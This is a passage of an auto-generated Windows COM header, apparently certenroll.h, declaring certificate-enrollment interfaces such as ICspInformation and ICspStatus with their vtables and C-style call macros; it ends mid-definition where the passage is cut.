#define ICspAlgorithms_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspAlgorithms_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspAlgorithms_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspAlgorithms_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspAlgorithms_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspAlgorithms_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspAlgorithms_get_ItemByName(This,strName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppValue) ) 

#define ICspAlgorithms_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspAlgorithms_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0007 */
/* [local] */ 

typedef 
enum X509KeySpec
    {	XCN_AT_NONE	= 0,
	XCN_AT_KEYEXCHANGE	= 1,
	XCN_AT_SIGNATURE	= 2
    } 	X509KeySpec;





extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0007_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0007_v0_0_s_ifspec;

#ifndef __ICspInformation_INTERFACE_DEFINED__
#define __ICspInformation_INTERFACE_DEFINED__

/* interface ICspInformation */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspInformation;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab307-217d-11da-b2a4-000e7bbb2b09")
    ICspInformation : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromName( 
            /* [in] */ __RPC__in BSTR strName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromType( 
            /* [in] */ X509ProviderType Type,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ VARIANT_BOOL MachineContext) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspAlgorithms( 
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HasHardwareRandomNumberGenerator( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsHardwareDevice( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsRemovable( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsSoftwareDevice( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Valid( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MaxKeyContainerNameLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out X509ProviderType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Version( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsSmartCard( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDefaultSecurityDescriptor( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_LegacyCsp( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCspStatusFromOperations( 
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICspInformationVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspInformation * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspInformation * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspInformation * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspInformation * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspInformation * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromName )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in BSTR strName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromType )( 
            __RPC__in ICspInformation * This,
            /* [in] */ X509ProviderType Type,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ VARIANT_BOOL MachineContext);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspAlgorithms )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HasHardwareRandomNumberGenerator )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsHardwareDevice )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsRemovable )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsSoftwareDevice )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Valid )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MaxKeyContainerNameLength )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Version )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsSmartCard )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetDefaultSecurityDescriptor )( 
            __RPC__in ICspInformation * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatusFromOperations )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        END_INTERFACE
    } ICspInformationVtbl;

    interface ICspInformation
    {
        CONST_VTBL struct ICspInformationVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspInformation_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspInformation_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspInformation_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspInformation_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspInformation_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspInformation_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspInformation_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspInformation_InitializeFromName(This,strName)	\
    ( (This)->lpVtbl -> InitializeFromName(This,strName) ) 

#define ICspInformation_InitializeFromType(This,Type,pAlgorithm,MachineContext)	\
    ( (This)->lpVtbl -> InitializeFromType(This,Type,pAlgorithm,MachineContext) ) 

#define ICspInformation_get_CspAlgorithms(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspAlgorithms(This,ppValue) ) 

#define ICspInformation_get_HasHardwareRandomNumberGenerator(This,pValue)	\
    ( (This)->lpVtbl -> get_HasHardwareRandomNumberGenerator(This,pValue) ) 

#define ICspInformation_get_IsHardwareDevice(This,pValue)	\
    ( (This)->lpVtbl -> get_IsHardwareDevice(This,pValue) ) 

#define ICspInformation_get_IsRemovable(This,pValue)	\
    ( (This)->lpVtbl -> get_IsRemovable(This,pValue) ) 

#define ICspInformation_get_IsSoftwareDevice(This,pValue)	\
    ( (This)->lpVtbl -> get_IsSoftwareDevice(This,pValue) ) 

#define ICspInformation_get_Valid(This,pValue)	\
    ( (This)->lpVtbl -> get_Valid(This,pValue) ) 

#define ICspInformation_get_MaxKeyContainerNameLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MaxKeyContainerNameLength(This,pValue) ) 

#define ICspInformation_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define ICspInformation_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define ICspInformation_get_Version(This,pValue)	\
    ( (This)->lpVtbl -> get_Version(This,pValue) ) 

#define ICspInformation_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define ICspInformation_get_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> get_IsSmartCard(This,pValue) ) 

#define ICspInformation_GetDefaultSecurityDescriptor(This,MachineContext,pValue)	\
    ( (This)->lpVtbl -> GetDefaultSecurityDescriptor(This,MachineContext,pValue) ) 

#define ICspInformation_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define ICspInformation_GetCspStatusFromOperations(This,pAlgorithm,Operations,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusFromOperations(This,pAlgorithm,Operations,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspInformation_INTERFACE_DEFINED__ */


#ifndef __ICspInformations_INTERFACE_DEFINED__
#define __ICspInformations_INTERFACE_DEFINED__

/* interface ICspInformations */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspInformations;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab308-217d-11da-b2a4-000e7bbb2b09")
    ICspInformations : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspInformation *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddAvailableCsps( void) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppCspInformation) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetCspStatusFromProviderName( 
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ X509KeySpec LegacyKeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetCspStatusesFromOperations( 
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEncryptionCspAlgorithms( 
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetHashAlgorithms( 
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICspInformationsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspInformations * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspInformations * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspInformations * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspInformations * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspInformations * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspInformations * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspInformations * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspInformations * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspInformations * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspInformations * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddAvailableCsps )( 
            __RPC__in ICspInformations * This);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppCspInformation);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetCspStatusFromProviderName )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ X509KeySpec LegacyKeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetCspStatusesFromOperations )( 
            __RPC__in ICspInformations * This,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEncryptionCspAlgorithms )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetHashAlgorithms )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } ICspInformationsVtbl;

    interface ICspInformations
    {
        CONST_VTBL struct ICspInformationsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspInformations_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspInformations_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspInformations_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspInformations_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspInformations_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspInformations_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspInformations_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspInformations_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspInformations_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspInformations_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspInformations_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspInformations_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspInformations_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspInformations_AddAvailableCsps(This)	\
    ( (This)->lpVtbl -> AddAvailableCsps(This) ) 

#define ICspInformations_get_ItemByName(This,strName,ppCspInformation)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppCspInformation) ) 

#define ICspInformations_GetCspStatusFromProviderName(This,strProviderName,LegacyKeySpec,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusFromProviderName(This,strProviderName,LegacyKeySpec,ppValue) ) 

#define ICspInformations_GetCspStatusesFromOperations(This,Operations,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusesFromOperations(This,Operations,pCspInformation,ppValue) ) 

#define ICspInformations_GetEncryptionCspAlgorithms(This,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetEncryptionCspAlgorithms(This,pCspInformation,ppValue) ) 

#define ICspInformations_GetHashAlgorithms(This,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetHashAlgorithms(This,pCspInformation,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspInformations_INTERFACE_DEFINED__ */


#ifndef __ICspStatus_INTERFACE_DEFINED__
#define __ICspStatus_INTERFACE_DEFINED__

/* interface ICspStatus */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspStatus;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab309-217d-11da-b2a4-000e7bbb2b09")
    ICspStatus : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt ICspInformation *pCsp,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pAlgorithm) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Ordinal( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Ordinal( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspInformation( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentStatus( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DisplayName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICspStatusVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspStatus * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspStatus * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspStatus * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspStatus * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspStatus * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCsp,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pAlgorithm);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Ordinal )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Ordinal )( 
            __RPC__in ICspStatus * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspAlgorithm )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformation )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentStatus )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DisplayName )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICspStatusVtbl;

    interface ICspStatus
    {
        CONST_VTBL struct ICspStatusVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspStatus_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspStatus_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspStatus_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspStatus_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspStatus_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspStatus_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspStatus_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspStatus_Initialize(This,pCsp,pAlgorithm)	\
    ( (This)->lpVtbl -> Initialize(This,pCsp,pAlgorithm) ) 

#define ICspStatus_get_Ordinal(This,pValue)	\
